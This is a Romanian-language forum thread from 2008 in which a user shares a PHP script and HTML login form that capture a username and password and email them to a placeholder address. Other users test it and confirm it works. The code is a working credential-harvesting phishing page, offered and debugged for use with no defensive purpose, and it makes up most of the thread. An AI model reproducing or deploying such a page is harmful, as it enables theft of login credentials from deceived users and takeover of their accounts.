+icebird Posted February 7, 2008 Report Posted February 7, 2008 Am facut(editat) un mic script care trimite doua input-uri (username si password) pe mail.Ultima data cand am incercat a mers dar nu afisa datele,acum l-am refacut si sper sa mearga...imi puteti spune daca voua v-a mers ? login.php: <?php $user = $_POST["user"]; $parola = $_POST["parola"]; if (mail("adresa@domeniu.com", "Informatii $user", "User: $user ~ Parola: $parola")) { echo "E-Mail trimis!"; } else { echo "A aparut o eraore!"; } ?> formular.html: <html> <head> <title>Formular</title> </head> <body> <div align="center"> <form action="login.php" method="post" name="form1"> Utilizator: <input type="text" name="user" id="user" /><br> Parola: <input type="password" name="parola" id="parola" /><br> <input type="submit" value="Trimite!" /> </form> </div> </body> </html> EDIT : Am incercat adineauri si a mers.Gaby tie iti merge pe rom.0lx.net ? Intr-un sistem rudimentar ca inchizita, tratam fara respect politia !
eutu9 Posted February 7, 2008 Report Posted February 7, 2008 hmm... Din punct de vedere al sintaxei si al logicii scriptul este bun... nu inteleg cum a putut sa mearga intr-un moment si in altul nu... poate ai facut sa ii faci upload sau era o alta greseala! Scriptul e bun!
+icebird Posted February 7, 2008 Author Report Posted February 7, 2008 Inainte era altceva..m-am grabit la editare..am schimbat numele variabilelor intr-un loc iar in altul am uitat si nu a mers ...acuma merge ! Closed Intr-un sistem rudimentar ca inchizita, tratam fara respect politia !
gaby Posted February 8, 2008 Report Posted February 8, 2008 nu, mie nu mi-a mers, imi afiseaza Email Trimis, dar nu vine nimic. probabil tot de la hosting tu ai incercat pe rom.0x.net ? Te-ai inregistrat? Ne-ar placea sa te prezinti. Cum pot sustine forumul? Cumpara de la eMag folosind acest link. --------------------
+icebird Posted February 8, 2008 Author Report Posted February 8, 2008 Da,si a mers,dar au venit cam intarziate mail-urile dar a mers,cu scriptu` din topicul asta ai incercat si nu a mers ? Intr-un sistem rudimentar ca inchizita, tratam fara respect politia !
gaby Posted February 8, 2008 Report Posted February 8, 2008 da, scuzele mele, m-am uitat acum pe seara si intr-adevar mail-urile au venit, m-am uitat imediat dupa ce am facut testul si nu venisera, dupa cum ai spus si tu au venit putin mai greu, oricum important este ca vin , multumesc mult de ajutor. Te-ai inregistrat? Ne-ar placea sa te prezinti. Cum pot sustine forumul? Cumpara de la eMag folosind acest link. --------------------
Recommended Posts